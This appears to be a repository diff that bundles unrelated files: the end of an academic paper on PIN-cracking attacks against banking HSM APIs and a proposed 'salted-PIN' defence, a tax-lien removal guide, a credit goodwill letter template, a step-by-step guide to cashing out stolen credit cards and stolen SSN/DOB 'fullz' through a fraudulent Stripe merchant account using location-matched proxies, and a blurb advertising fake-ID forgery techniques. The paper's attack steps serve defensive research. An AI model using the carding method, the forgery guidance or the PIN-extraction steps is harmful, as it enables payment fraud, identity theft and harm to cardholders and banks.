PIN block format, and the transport key (residing inside the HSM). The offset +is calculated by subtracting the Natural PIN from the Final PIN. +VISA PIN Verification Value (PVV). Fig. 2 depicts how a VISA PIN Verification Value (PVV) is calculated. +PVVs are used in a similar fashion as IBM offset values, and also (generally) stored in a plaintext database. A +customer’s PVV may be written on her bank card as well (for offline PIN verification). +EPB +Transport +PIN block Key Decrypt EPB and extract +format Final PIN (4 digits) +PAN +PIN Key Transformed Security Parameter (TSP) = +Index 11 PAN digits || PIN Key Index || Final PIN +PVV Key Encrypt TSP +(issuer) +Decimalization +Table Extract 4 decimal digits +PVV +Fig.2. PVV calculation (adapted from [14], || denotes concatenation) +3 Salted PIN +Here we present the salted-PIN proposal in its simplest form. +Threat model and notation. Our threat model assumes attackers have access to PIN processing APIs and +transaction data (e.g. Encrypted PIN Blocks, account number) at switches or verification centers, but do not have +directaccesstokeysinsideanHSM,ormodifyHSMsinanyway.Attackerscanalsocreatefakecardsfrominformation +extractedatswitchesorverificationcentersandusethosecards(perhapsthroughoutsideraccomplices).Weprimarily +considerlargescaleattackssuchasthose thatcanextractmillions ofPINs inanhour[4].We donotaddressattacks +that arenot scalable,suchas card skimming, attacksonEMV5 PINentry devices [11],or cases where anaccomplice +steals acardandcallsaninsider ata switchorverificationcenterfor anappropriatePIN.PINcrackingattacksthat +we considerare successful only when online PINverificationis applied (i.e. encrypted PINs are sent to a verification +centerforapproval).Inadditiontomagnetic-stripecards,theseattacksarealsovalidforchip/EMVcardsexceptwhen +offline/on-chip PIN verification is used (assuming card issuers allow EMV cards to fallback to magstripe processing +for backward compatibility or chip failure). The following notation is used: +5 EMV is a growing standard for chip-based bank cards, initially developed by Europay, MasterCard, and VISA; see +http://www.emvco.com. + +5 +PAN User’s Primary Account Number(generally 14 or 16-digit). +PIN User’s Final PIN (e.g. 4-digit, issued bythe bank or chosen by theuser). +PINt User’s Transport Final PIN (TFP). +Salt Long-term secret valueshared between the usercard and issuing bank. +fK(·) A cryptographically secure Pseudo-Random Function (PRF).6 HereK is the PRFkey. +3.1 Generating Salted-PINs +A randomly generated salt value of adequate length (e.g. 128 bits, to make dictionary attacks infeasible) is selected +by a bank for each customer. The salt is stored on a bank card (chip-card or magstripe) in plaintext, and in an +encrypted form at a verification facility under a bank-chosen salt key. API programmers (i.e. those who use HSM +API)haveaccesstothis encryptedsalt(butdonotknowthe saltkeyorplaintextsaltvalues).Encryptedsaltvalues +alsocannotbeoverwrittenbyAPIprogrammers.AuserinputsherPINatanATM,andtheATMreadstheplaintext +salt value from the user’s bank card and generates a Transport Final PIN (TFP) as follows. +PIN =f (PAN,PIN) (3.1) +t Salt +ThePRFoutputisinterpretedasanumberanddividedby1012;the12-digitremainder(i.e.PRFoutputmodulo +1012) is chosenas PIN andtreatedas the Final PINfromthe user.Note that the maximumallowedPIN lengthby +t +ISOstandardsis12.The ATMencryptsPIN withthe transportkeysharedwiththe adjacentswitch,andformsan +t +Encrypted PIN Block (EPB). An intermediate switch decrypts an EPB, (optionally) reformats the PIN block, and +re-encrypts using the next switch’s transport key. Additional functionalities are not required from these switches. +To set the initial offset or PIN verification value (PVV), an issuer generates a random PIN (e.g. 4 digits long) +and salt for a user, and then uses equation (3.1) to generate PIN . The transport key of the verification HSM is +t +used to encrypt PIN and form an EPB. This EPB is used to call a calculate offset/PVV function with the user’s +t +PAN and encrypted salt to generate the initial offset/PVV (note that each of these values is now 12 digits long). +PAN +PIN Key +Encrypt PAN +(issuer) +Decimalization +Table Decimalize the encrypted PAN +Natural PIN (4 leftmost digits) +Encrypted +Salt +Salt Key Decrypt Salt +(issuer) +PAN Transport Natural PIN = +Decimalize(PRF(PAN, Natural PIN, Salt)) +EPB Decrypt EPB and extract +PIN block format Transport Final PIN +Transport +Key +Transport Final PIN - Transport Natural PIN +Offset +Fig.3. Salted-PIN verification for the IBM offset method +6 For example, as used in PwdHash [15]. + +6 +3.2 Offset/PVV Verification with Salted-PIN +The salted-PIN verification for the IBM offset method (recall Section 2) is shown in Fig. 3. The Natural PIN is +calculated from a PAN using an issuer’s PIN key. The encrypted salt value corresponding to the PAN is decrypted +usingasaltkey(likethePINkeyandtransportkey,thesaltkeyalsoresidesinsideanHSM).TheTransportNatural +PIN is generated from the Natural PIN using equation (3.1). The Transport Final PIN is extracted from an EPB, +and the Transport Natural PIN is subtracted from it (digit by digit modulo 10 subtraction) to get the offset. This +calculatedoffsetvalueiscomparedwiththecorrespondingPAN’sstored(e.g.inadatabase)offsetvalue.The salted- +PINverificationforVISAPVVisshowninFig.4.ThesaltvalueisappendedattheendoftheTransformedSecurity +Parameter (TSP), which is encrypted and decimalized to calculate the PVV. Note that we design the offset/PVV +verification functions to keep them similar to the existing functions although these can be further simplified; for +example, instead of storing offset/PVV values, EPBs directly may be stored and compared with incoming EPBs. +Encrypted Salt +Salt Key +Decrypt Salt +(issuer) +EPB +Transport +Key Decrypt EPB and extract +PIN block format +Transport Final PIN +PAN +PIN Key Transformed Security Parameter (TSP) = +Index PAN || PIN Key Index || Transport Final PIN || Salt +PVV Key +Encrypt TSP +(issuer) +Decimalization +Table Extract 12 decimal digits +PVV +Fig.4. Salted-PINverification for VISAPVV +3.3 Salted-PIN Protection against PIN Cracking Attacks +We discuss attacks (e.g. translate-only [4]) that reveal a user’s TFP in Section 4. An attacker with write-access to +the PVV database at a verification facility can choose any PIN for a specific account (see Section 7.3). With the +salted-PIN solution, an attacker can still choose any PIN to pack in an EPB and write the resulting PVV to a +database. However, without knowing the salt value, overwriting a user’s PVV does not help in an attack for the +following reason. The salted-PIN verification function for PVV (Fig. 4) ensures use of the encrypted salt value as +indexed by a user’s PAN; thus for a successful PVV verification, a user’s salt must be known or the encrypted salt +value must be replaced. +4 Attacks on Salted-PIN +We now discuss attacks against the basic version of salted-PIN. +4.1 Enumerating EPBs through Translate-only Attacks +HerethegoalofanattackeristocreateatableofEPBs,andthencrackallorasubsetofuseraccounts.Thefollowing +attacks in part follows an efficient variant of the translate attack as outlined by Berkman and Ostrovsky [4]. For +theseattacks,weassumeanattackerM isaninsider(e.g.applicationprogrammer)ataswitchorverificationcenter, +i +and an outsider accomplice M who helps M in carrying out user input at an ATM. These attacks are possible for +a i +the following reason. Although a TFP is calculated from a long (e.g. 128 bits, sufficient to deter dictionary attacks) + +7 +salt value, only 12 digits of the PRF output are used. Thus an attacker only requires any pair of salt and PIN +combination that can generate a targeted account’s TFP instead of finding the actual salt/PIN values. +Targeting all accounts. Assume that M extracts the salt value (Salt ) and PAN from a card he possesses, and +i a +uses equation (3.1) to generate the 12-digit TFP PIN (through software or a hardware device, using any PIN +at +PIN +a +). Let PIN +at +consist of p1p2p3...p12 where each p +i +(i = 1 to 12) is a valid PIN digit. Then M +a +inserts this +card to an ATM, and enters PIN . Assume that the generated PIN is encrypted by the ATM to form an EPB, +a at +E1.M +i +captures E1 at a switch. If E1 is notin the ISO-1 format,M +i +translates it into ISO-1 (to disconnectE1 from +the associatedPAN). Let the translated (if needed) E1 in the ISO-1 format be E +1 +′ . E +1 +′ is then translatedfrom ISO-1 +to ISO-0 using p3p4...p1200 as the input PAN. This special PAN is chosen so that the XOR of PIN positions 3 to +12 with PAN positions 1 to 10 removes p3...p12 when the translation API is called; i.e., +PIN block inside E1 ′ =0Cp1 p2 p3 p4 p5 p6 p7 p8 p9 p10 p11 p12 FF +InputPAN =0 0 0 0 p3 p4 p5 p6 p7 p8 p9 p10 p11 p12 0 0 +Resulting ISO-0PIN block =0Cp1 p2 0 0 0 0 0 0 0 0 0 0 FF +Assume the resulting EPB is E +p1p2 +which is the same as the one containing a TFP p1p20000000000with PAN 0. +Now we can create all EPBs containing every 12 digit TFPs starting with p1p2 from E +p1p2 +. For example, an EPB +with p1p2q3q4...q12 as the TFP can be generated through transforming E +p1p2 +using PAN q3q4...q1200 (in ISO-0). +Thus we can create all 1010 EPBs with TFPs from p1p20...0 to p1p29...9. +Starting from a different p1p2, all 1012 EPBs containing every 12 digit TFP can be generated as follows. M +a +uses the previous bank card (i.e. the same salt and PAN) with different PINs (obviously, including wrong PINs) +to calculate TFPs using software or a special device. When a TFP is found with the first two digits different than +p1p2, the corresponding PIN is entered at an ATM. The attacker M +i +at the switch then generates another set of +1010 EPBs containing TFPs starting with this different p1p2. The attack continues with different PINs until all +100 possible values of the initial two TFP digits are covered. Thus using these 100 EPBs containing TFPs starting +with the different first two digits (i.e. from 00 to 99), M can create a table of EPBs for all possible TFPs (with +i +corresponding PINs). The cost of building this table is slightly over 1012 API calls (for each 100 E , at most two +p1p2 +API calls are required). The cost of selecting the initial EPBs (i.e. that contain TFPs with two different starting +digits) is insignificant as M can calculate TFPs offline, i.e., without involving any API calls to HSMs. +a +To launch an attack,a valid EPB of a target customer is collected. The EPB is translated to ISO-1 (to decouple +it from the target account, if not already in ISO-1), then to ISO-0 with PAN 0. The resulting EPB is then located +onthe EPB table (as createdin the setup phase).The correspondingPINfromthe table cannow be used to exploit +a card generated with the target’s PAN, and the attacker’s salt value (i.e. Salt ). The cost of this attack is at most +a +two API calls and a search of O(1012), i.e., O(240). +In summary, the setup cost of this attack is about 1012 API calls with a per account cost of two API calls plus +a search of O(1012). The same translate-only attack by Berkman and Ostrovsky [4] on the current implementation +of PIN processing requires only about 10,000 API calls as setup cost, and a per account cost of two API calls plus a +search of O(103). +Algorithm 1 Steps in the partial table attack +1: for i=0 to106−1 do +2: Ec0 =Translate ISO−0(Ec,i×100) +3: if Ec0 is in the table then +4: TFP in Ec =106 × (six digit TFP from thetable) + i +5: Salt and PIN values corresponding to Ec is used to generate a fake card +6: exit +7: end if +8: endfor +Trade-off between table size and per EPB attack cost. The per account cost of the above attack is not high +enough to deter an attack. However, the setup cost of building the table with all one trillion EPBs is apparently +significant (although this is a one-time cost). By reducing the table size, the attack can be launched with fewer API +calls although the per EPB attack cost increases accordingly. +6 +Assume that the attacker builds a table of 10 EPBs (i.e. one half of the original table size) containing TFPs +endingwithsixzeros(000000),i.e.,storingonlythefirstsixdigitsofaTFP.Withthistable,anattackercancalculate +TFP of any target EPB E in 106 steps (assuming the EPB arrives in ISO-1 format, or the attacker translates it +c +into ISO-1); each step then requires one API call. The attack is described in Algorithm 1. + +8 +Now the cost of attacking N accounts is 106+N ×106 API calls. The attacker can also vary the table size and +the numberof steps foreachtargetaccount.For anytable size 10n forn∈{2,3,...,12},the requirednumber ofper +account translate steps is 1012−n. Thus in general the cost of attacking N account is 10n+N ×1012−n. +4.2 Replay Attack +In this attack, an adversary M at a switch or verification center collects a valid EPB E for a target PAN A , and +i c c +then creates a fake card with the account number A (and any salt value). Note that M here does not know the +c i +actual salt value or PIN for the target account. An accomplice M uses the fake card with any PIN at an ATM, +a +andthe ATMgeneratesafalse EPBE .At the switch/verificationcenterM locatesE intransfer,andreplacesE +a i a a +with the previously collected correct EPB E . Thus the fake card will be verified by the target bank, and M can +c a +access the victim’s account. +Notethatthisattackworksagainstthebasicvariantofsalted-PINaswellascurrentPINimplementationswithout +requiring any API calls. Although quite intuitive, this attack has not been discussed elsewhere to our knowledge. +5 Variants of Salted-PIN +As we discussed in Section 4, the basic version of salted-PIN is vulnerable to several attacks. Other than the replay +attack, the setup cost of launching these attacks is not trivial as previous PIN cracking attacks (cf. [4]) although +the per account attack cost is apparently manageable. In this section, we outline three variants of salted-PIN to +practically restrict these attacks by increasing the per account attack cost. +Service-point specific salted-PIN. If a fake bank card is created for a target account (e.g. through the attacks +in Section 4), the card can be used from anywhere as long as it remains valid (i.e. the issuing bank does not cancel +it). To restrict such attacks, we modify equation (3.1) as follows. +PIN =f (PAN,PIN,spsi) (5.1) +t Salt +Herespsistandsforservice-point specific information suchasa‘cardacceptoridentificationcode’and‘cardacceptor +name/location’ as in ISO 8583 (Data Elements fields). The verification center must receive spsi as used in equation +(5.1). Although any PINcrackingattack (Section 4.1)can be used to learna TFP orbuild a full/partialEPB table, +the table is valid only for the particular values of spsi. Also, the replay attack (Section 4.2) may succeed only when +the accomplice exploits a compromised card from a particular ATM. Thus this construct generates a localized TFP +for each PIN verification, and thereby restricts the fake card to be used only from a particular location/ATM. Note +that for this variant, the verification facility cannot use PVV or Offset values, because they would be different for +each ATM. Another verification value would need to be designed. +Salted-PIN with double EPBs. ISO PIN block formats restrict PIN length to 12 digits in an EPB. This length +limit enables a search of O(240) in a pre-built table (see in Section 4.1). As a variant, instead of choosing 12 digits +from the result of equation (3.1), we can take 24 digits (i.e. PRF output modulo 1024) and create two PIN blocks, +t +each12digitslong.Asaresult,twoEPBsmustbe sentfromanATM,andaverificationfacilityneedsbothEPBsto +verifyauser’sPIN.However,intermediateswitchesmaynotneedtobeawareofthis.AnattacksimilartoSection4.1 +can be launched on each EPB separately, and two tables can be built for both parts of a 24-digit TFP; the cost +of building the table simply doubles (two TFP tables, each has 1012 entries). Using the tables, a 24-digit TFP can +be extracted from the two EPBs of any target account. However, determining a valid pair of salt value and PIN is +not straightforward as the attack in Section 4.1. To generate a fake card (i.e. to find an appropriate salt value and +PIN for the intended TFP) for this variant of salted-PIN, attackers must apparently carry out a computation of +1024 (i.e. O(280)) steps. However, this variant is vulnerable to the replay attack (Section 4.2) when equation (3.1) +is used. Again, service-point specific information as used in equation (5.1) for generating TFP can practically limit +such attacks. +End-to-end PIN encryption/MAC. Using the stored salt as an encryption key, end-to-end PIN encryption can +be achieved between an ATM and verification center. The salt value can also be used for calculating a message +authentication code (MAC) for a user’s Final PIN. This variant can secure PIN transportation to the extent of the +algorithmusedforencryptionorMAC.Thusitcaneffectivelyeliminate PINenumerationby anattackerataswitch +or verification center. However, to restrict the replay attack (Section 4.2), one or more service-point specific items +must be used with a PIN for encryption or MAC. + +9 +6 Implementation Challenges +One implementation challenge for salted-PIN could be the storagerequirement for the salt (39 decimal digits or 128 +bits) that must be stored on a bank card. There are four possible scenarios: (1) magnetic-stripe (magstripe) cards; +(2) chip-card with a magnetic stripe at a magstripe reader terminal; (3) chip-card with online PIN verification; and +(4) chip-card with offline PIN verification. For the last case, as a PIN does not leave the card, PIN cracking attacks +areimmaterial.For the firsttwo cases,the amountofdata thatcanbe storedona magnetic stripe is limited by ISO +standards; for example, according to ISO-7811,track one in a magstripe bank card holds 79 six-bit characters (plus +a parity check), and track two holds 40 four-bit (plus a parity) characters.These two tracks are generally present in +most magstripe bank cards (there is also a third track on some cards). A salt may be stored on a magstripe card +by overloadingnon-essentialdata fields in track one (e.g. discretionary data, name, expirationdate), and redundant +fields in track two (e.g. PAN). Chip-cards offer significantly more storage capability, and thus for the third case, +accommodating the salt may not be an issue. +Salted-PIN requires that service points (e.g. ATMs, point-of-sale terminals) are capable of computing PRF as in +equation (3.1). Thus another implementation challenge is posed by the limited computing ability of old magstripe +readerterminals withlimited CPUcapabilitiesandcryptographicsupportofonly a DESchip; recentterminals (e.g. +Motorola’s PD4750) generally operate on a 32-bit processor,and computing a PRF is not a computational issue. +7 Review of Earlier PIN Cracking Attacks +For convenience to the reader and for reference within, here we summarize several representative attacks from +BerkmanandOstrovsky[4].Forreasonsofbrevity,weomithowsomespecific assumptionsrequiredbytheseattacks +are met, as well as any efficiency analysis of these attacks (e.g. how many API calls are required for a given attack +to succeed). +7.1 Translate PIN Block Attacks +We now review the translate-only API attack which requires an attacker to generate/collect Encrypted PIN Blocks +(EPBs) of all possible PINs, and access to the translate API function. This attack reveals plaintext PINs, and can +be applied at a switch or verification facility. The steps in the attack are as follows. +1. Let A be any attacker chosen PAN. +x +2. Attackers collect/generate 10,000 EPBs which pack all possible PINs in any ISO format (i.e. the format and +PAN of those EPBs are immaterial). Suppose i is any 4-digit PIN, and E′ packs i in any ISO format. +i +3. Translate all 10,000 EPBs to ISO-0 EPBs using A as the PAN. Assume E is the resulting EPB from the +x i +translation API. +E +i +=Translate ISO−0(E +i +′ ,A +x +),where i∈{0000...9999}. +Now E packs PIN i in the ISO-0 format (with respect to A ). Make a table with the resulting EPBs and PINs, +i x +i.e., (E , i). +i +4. For any customer EPB, E , calculate +c +E +t +=Translate ISO−0(Translate ISO−1(E +c +),A +x +). +Here,anattackerfirstconvertsthecustomerEPBtoISO-1(whichunlinksaPINwiththecorrespondingcustomer +PAN), and then uses this result with the attacker’s chosen PAN to generate an EPB in ISO-0 format. +5. Locate E in the table generated at step 3. The corresponding PIN is the PIN packed inside E . +t c +7.2 Attacks Exploiting the IBM Calculate-Offset API +The steps in the IBM Calculate-Offset attack at a verification facility and intermediate switch are now outlined. +Calculate-Offset Attacks at a Verification Facility. Here the attackeris someone at a verificationfacility, e.g., +an application developer. The steps in the attack are as follows. +1. Generate an EPB E that packs a known Final PIN PF . +a a + +10 +2. For any customer account, A , calculate: +c +offset =CalculateOffset(E ,A ). +a c +Ifthecustomer’sNaturalPINisPN ,thenoffset =PF −PN .Here‘−’isdigitbydigitmodulo10subtraction; +c a c +offset and PF are known to the attacker. Thus the attacker learns the customer’s Natural PIN. If the attacker +a +can read the plaintext offset value of the customer, then the customer’s Final PIN is revealed. +Calculate-Offset Attack at a Switch. The steps of a calculate-offset attack at a switch are as follows. +1. Generate an EPB E that packs a known Final PIN PF . +a a +2. Select any (random) PAN A . +x +3. Assumethatattackersdonothaveaccesstotherealissuerkeyataswitch.However,theycancalculateadummy +offset using a dummy issuer key (i.e. whatever issuer key is available in the switch’s HSM): +offset =CalculateOffset(E ,A ) +d1 a x +i.e., offset = PF −PN . Here PN is the dummy Natural PIN with respect to the account A . So now +d1 a xd xd x +PN can be calculated as both PF and offset are known. +xd a d1 +4. For any customer EPB E which packs the customer’s Final PIN PF , calculate: +c c +offset =CalculateOffset(E ,A ) +d2 c x +i.e., offset =PF −PN . The value of PN is known from the previous step, thus revealing the customer’s +d2 c xd xd +Final PIN. +7.3 Attacks Exploiting the VISA PIN Verification Value (PVV) +The steps in the VISA PVV attack at a verification facility and intermediate switch are outlined below. +PVV Attacks at a Verification Facility. Attackers need an EPB with a known PIN, and may need write access +to the issuer’s PVV database. Again, like offset values, PVVs are considered security insensitive. The attack is as +follows. +1. Generate an EPB E which packs a known Final PIN PF . +a a +2. For any customer PAN A , +c +pvv =CalculatePVV(E ,A ). +a c +3. Use the calculated PVV with known PIN to create new bank cards (this may also require updating the PVV +database at the verification facility). +PVV Attacks at a Switch. Using 10,000EPBswhichpack allpossible PINs,attackerscan revealcandidate PINs +(less than two, on average)for any customer as follows. Note that the attack HSM here does not have access to the +real issuer PVV key; the attack succeeds if any PVV key is available. +1. Choose any PAN A . +x +2. Generate EPBs for all possible PINs; assume E packs PIN i, where i∈{0000...9999}. +i +3. For all EPBs generated in step 2, calculate PVVs with respect to A : +x +pvv =CalculatePVV(E ,A ). +i i x +Now sortthe values of pvv and build a table of entries (pvv ,i). More than one (on averageless than two) PINs +i i +may be indexed by a given PVV. +4. For any customer EPB E , compute +c +pvv =CalculatePVV(E ,A ). +c x +Use the resulting PVV as an index to the table built in step 3. The corresponding PIN is the customer’s Final +PIN PF ; in case of multiple PIN values indexed by pvv, PF is one of those values; building the table using a +c c +different A may resolve collisions. +x + +11 +8 Conclusion +Inthe30-yearhistoryoffinancialPINprocessingAPIs,severalflawshavebeenuncovered.Inthispaper,wesummarize +some API attacks from Berkman and Ostrovsky [4] for context, and introduce a salted-PIN proposal and three of +its variants to counter these attacks. Our preliminary analysis in this paper indicates that salted-PIN can provide +a higher barrier to these attacks in practice by making them considerably more expensive (computationally). We +have discussed some deployment issues, but acknowledge that this discussion is not exhaustive; deployment barriers +may arise from unseen aspects. Salted-PIN is motivated primarily by the realistic scenario in which an adversary +may control switches, and use any standard API functions to reveal a user’s PIN; i.e., an attacker has the ability to +perform malicious API calls to HSMs, but cannot otherwise modify an HSM. +Our proposal of salted-PIN is intended to stimulate further research and solicit feedback from the banking +community regarding: (1) whether salted-PIN may improve PIN security in real terms; (2) practical barriers of +deployingsalted-PIN;and(3)anysignificantweaknessesofsalted-PIN.Wefocusonprovidingatechnicalsolutionto +update PIN processing APIs, some of which are well-known to be flawed. Instead of relying, perhaps unrealistically, +on honest intermediate parties (who diligently comply with mutual banking agreements),we strongly encourage the +banking community to invest effort in designing protocols that do not rely on such assumptions which end-users +(amongothers)havenowayofverifying.Ithasbeenspeculated[4]thatPINcrackingattacksmayexplainnumerous +unexplained ‘phantom’ withdrawals [5] as reported by many ATM fraud victims. +Acknowledgements +Thisworkbenefitedsubstantiallyfromdiscussionand/orfeedbackfromanumberofindividuals,including:Bernhard +Esslinger of University of Siegen, Joerg-CorneliusSchneider and Henrik Koy of Deutsche Bank, especially regarding +attacksonthe simple versionofsalted-PIN;a reviewerfroma largeCanadianbank;Glenn Wurster;andanonymous +reviewers.The firstauthoris supportedinpartby anNSERC CGS.The secondauthoris CanadaResearchChairin +Network and Software Security, and is supported in part by an NSERC Discovery Grant, and the Canada Research +Chairs Program. +References +1. Algorithmic Research (ARX). PrivateServer Switch-HSM. White paper. http://www.arx.com/documents/Switch-HSM. +pdf. +2. R.Anderson. Why cryptosystemsfail. Communications of the ACM,37(11), Nov.1994. +3. R. Anderson, M. Bond, J. Clulow, and S. Skorobogatov. Cryptographic processors – a survey. Proceedings of the IEEE, +94(2), Feb. 2006. Invitedpaper. +4. O.BerkmanandO.M.Ostrovsky.TheunbearablelightnessofPINcracking. InFinancialCryptographyandDataSecurity +(FC), Scarborough, Trinidad and Tobago, Feb. 2007. +5. M. Bond. Phantom withdrawals: On-lineresources for victims of ATMfraud. http://www.phantomwithdrawals.com. +6. M. Bond. Understandingsecurity APIs. Ph.D. Thesis, Computer Laboratory, University of Cambridge, 2004. +7. M. Bond. Attacks on cryptoprocessor transaction sets. In Workshop on Cryptographic Hardware and Embedded Systems +(CHES), Paris, France, May 2001. +8. M.BondandP.Zielinski.DecimalisationtableattacksforPINcracking.Technicalreport(UCAM-CL-TR-560),Computer +Laboratory, University of Cambridge, 2003. +9. M.BondandP.Zielinski. Encrypted?Randomised?Compromised?(Whencryptographically secureddataisnotsecure). +In Workshop on Cryptographic Algorithms and their Uses, Gold Coast, Australia, July 2004. +10. J. Clulow. The design and analysis of cryptographic APIs for security devices. Masters Thesis, University of Natal, +Durban,South Africa, 2003. +11. S. Drimer, S. J. Murdoch, and R. Anderson. Thinking inside the box:System-level failures of tamper proofing. In IEEE +Symposium on Security and Privacy (to appear), May 2008. Also avialable as a technical report (UCAM-CL-TR-711) at +http://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-711.html. +12. International Organization for Standardization (ISO). Banking – Personal Identification Number (PIN) management +and security – Part 1: Basic principles and requirements for online PIN handling in ATM and POS systems, Apr. 2002. +International Standard,ISO 9564-1. +13. M. Mannan and P. C. van Oorschot. Using a personal device to strengthen password authentication from an untrusted +computer. In Financial Cryptography and Data Security (FC), Scarborough, Trinidad and Tobago, Feb. 2007. +14. O.M. Ostrovsky. Vulnerabilities in thefinancial PIN processing API. Masters Thesis, Tel AvivUniversity,2006. +15. B.Ross,C.Jackson,N.Miyake,D.Boneh,andJ.C.Mitchell. Strongerpasswordauthenticationusingbrowserextensions. +In USENIX Security, 2005. diff --git a/Remove Tax Liens_pdf.md b/Remove Tax Liens_pdf.md new file mode 100644 index 0000000..c689674 --- /dev/null +++ b/Remove Tax Liens_pdf.md @@ -0,0 +1,33 @@ +# Remove Tax Liens + + +--- + +HOW TO REMOVE TAX LIEN JUDGEMENT +Step 1: Complete IRS Form 12277 +This form serves as a request for withdrawal of the original tax lien. Before filling out this form, try to locate the +Form 668(Y) you were sent by the IRS as notification of the original tax lien. This can help to expedite the +process. However, you can still fill out this form if you don’t have the 668(Y). +For questions 11 on the form, select the option that states: +“The taxpayer, or the Taxpayer Advocate acting on behalf of the taxpayer, believes withdrawal is in the best +interest of the taxpayer and the government.” +For question 12, enter the words “Fresh Start Program.” +Step 2: Send Form 122277 to the IRS +Use IRS publication 4235 to determine the regional IRS where your form should be mailed. Send your form via +certified mail. +Step 3: Wait for response from IRS +After 30-45 days, the IRS will contact the court house where the lien was filed to notify them to withdraw it. You +will also be sent a copy of this notification. +Step 4: Dispute the lien with the Credit Reporting Agencies +When you dispute a tax lien with Equifax, Experian or TransUnion, they contact the courthouse where the lien +was filed to determine if the information is still accurate. Since the courthouse has been notified that your lien +was withdrawn, by disputing the lien with the above Credit Reporting Agencies at their respective websites, you +should be able to have the lien removed quickly. +Step 5: Final confirmation +Each of the credit reporting agencies will send you a notification of how your dispute turned out. If the lien was +not removed from any or all of your reports, file a second dispute in writing and include a copy of the notification +from the IRS that your lien has been withdrawn. +Tax liens on a credit report can not only bring down your credit score significantly, but they can also be a +deciding factor in a lender deciding to deny you a loan or credit card. Getting them resolved and off your credit +reports a quickly as possible is imperative. If you have unpaid liens, visit IRS.gov to learn more about your +options for settlement or payment plan. diff --git a/STRIPE CC TO BTC METHOD_txt.md b/STRIPE CC TO BTC METHOD_txt.md new file mode 100644 index 0000000..f47244d --- /dev/null +++ b/STRIPE CC TO BTC METHOD_txt.md @@ -0,0 +1,41 @@ +# STRIPE CC TO BTC METHOD + + +--- + +NOTE : This is a private method tested by me and its 100% working if you follow +detailed instructions. +NEEDED ITEMS :: +1. A Good Website cloned or Properly Setup +2. Domain registered email +3. Merchant Account +4. Dead Fullz : not including CC details just DOB and SSN +4. A US Checking Account or savings account : Only the routing number and account +number is needed so you can change the account at any time without problem since +account name is not needed. +NOTE: It only works with US BANK ACCOUNT. +METHOD :: +What is Stripe? +Stripe is the easiest way to accept credit and debit card payments online. With Stripe, +you can create exactly the payment experience you want in your website or mobile +app, and we handle everything from security to daily transfers to your bank account. +You can get started immediately. +HOW DOES IT WORK +GO to Stripe.com and Register for a Merchant Account with your Website as +Business name note you must have an SSN or DOB to register the company its very +easy to register next do not use a free email to register as a merchant your account +would be setup immediately and domain name will be confirmed since you used +domain registered email. +There are detailed step to step guide there on how to intergrate the payment form +into your website then you are ready to cashout your cvv both non vbv and vbv card +work effectively worldwide cards also work effective. Advantage over other processor +you can charge ccv yourself on the dashboard of your stripe account without +charging it through your website. Payments are transferred into your bank account +within 7days not like other processors that send payment in 30days. +NOTE : to be effective do not charge more than 300$ for US cvv and more than 500$ +for International cvv. with this method you can make as much as 5000$ on weekly +basis. +NOTE : when charging a cvv use the same state socks and for international cvv use +the same country socks since it takes note of charges done and ip don't use dead +cvv for charging be sure card is live before you attempt charging any cards since if +too much failed cards is noted your account can be blocked. diff --git a/Sample-Goodwill-Letter-3_pdf.md b/Sample-Goodwill-Letter-3_pdf.md new file mode 100644 index 0000000..4cbecf4 --- /dev/null +++ b/Sample-Goodwill-Letter-3_pdf.md @@ -0,0 +1,35 @@ +# Sample-Goodwill-Letter-3 + + +--- + +COMPANY NAME +ACCOUNT NUMBER +Address +To Whom it May Concern atCOMPANY NAME, +I am writing to you today regarding my-----------account which I had while I was astudent at--------------- +---------------------. The purpose of my correspondence is to see if you would be willing to make a +"goodwill" adjustment on the reporting of this account to the three credit agencies. +During the time period this account was established I had was very happy with the service, I was +however not the ideal customer and made mistakes with my handling of the account. I should have kept +better records regarding the account and I take full responsibility. I became aware of the unpaid balance +when I got a copy of mycredit report inMONTHof 20XX. +I know that payment was my responsibility and I am not attempting to justify this breach of------------ +user agreement, I was however hoping you might review the circumstances under which this non- +payment occurred and consider removing the negative trade line associated with this account from my +three credit reports. +As soon as I became aware of the balance I contacted-----------------and paid the balance in full. I provide +this not to justify why the account was unpaid, but rather to show that the issue with-----------is not a +good indicator of my actual credit worthiness. I hope that----------------is willing to work with me on +erasing this mark from my credit reports. +I would like to STRESS that the information currently being reported IS accurate, (I am not disputing +anything with---------------). I am simply asking-------------for a courtesy gesture of goodwill in having the +credit bureaus remove this account from my report. I do recognize that this request is unique and that it +may not be-------------normal policy. Please consider that the Fair Credit Reporting Act does not demand +that all accounts be reported, only that any account that is reported be reported accurately. Therefore, +a company does have legal discretion and permission to remove any account it chooses from the credit +report. I'm hoping that-------------will do that in my case for this account. +Your kind consideration in thismatter is greatly appreciated. +Best Regards +Name +Address diff --git a/Secrets of ID Man_pdf.md b/Secrets of ID Man_pdf.md new file mode 100644 index 0000000..0ac6855 --- /dev/null +++ b/Secrets of ID Man_pdf.md @@ -0,0 +1,2456 @@ +# Secrets of ID Man + + +--- + +To shield themselves from the chronic barrage of bureaucrats and their +incessant need to monitor every facet of Ollr existence, some veterans of +the privacy wars have resorted to creating new identities. But producing +credible IDs is much harder than ever before as the bureaucratic machine proli~ +ates such Orwellian devices as holograms and magnetic swipes to thwart modern +desktop counterfeiters. +In his latest book, veteran privacy author Sheldon Charrett (The Modern Identity +Changer and IdeHtity, Privacy, and Personal Freedom) shows how persistent privacy +seekers readily replicate driver's licenses, birth certificates, and other supposedly +"secure" identity documents. In Secrets of a Back-Alley ID Man you will Jearn about +• the most effective "new school" and "old school" techniques and tricks for +IDs, as well as "poor man's" techniques for those on a tight budget +• groundbreaking research in hologram reproduction +• the latest printers, scanners, cameras, software, and other equipment used +to make fake IDs +• do-it-yourself computer templates for driver's licenses and notary, +corporate, municipal, and state seals +• ways to make composite IDs using a standard 35mm camera +• the availability of ready-made IDs from other sources +With more than 50 detailed photographs and a dozen tables and illustrations, this +book shows you step by step how metallic holograms are made and repetitive letter +ing is placed on lamination. Charrett also reveals a technique for reproducing rainbow +holograms that has never before been published by anyone, anywhere, as well as his +own previously unpublished technique for making cheap and effective embossing +plates for notary and state seals. Also included are difficult-to-find driver's license +backs, which are nonexistent on the Internet and ignored in other ID books. +If you've ever wondered whether a 21st centurion can still change identities, +you'll want to read this book. For academic study ollly. +A PALADIN PRESS BOOK' ISBN 1-58160-268-5 +II~IMIIIIIII +11111111111111111111111111 +9 781581 602685 +Visit our Web site at www.paladin-prcss.com + +Also by Sheldon Charrett: +Electronic Circuits and Secrets of an Old-Fashioned Spy +Identity, Privacy, and Personal Freedom +The 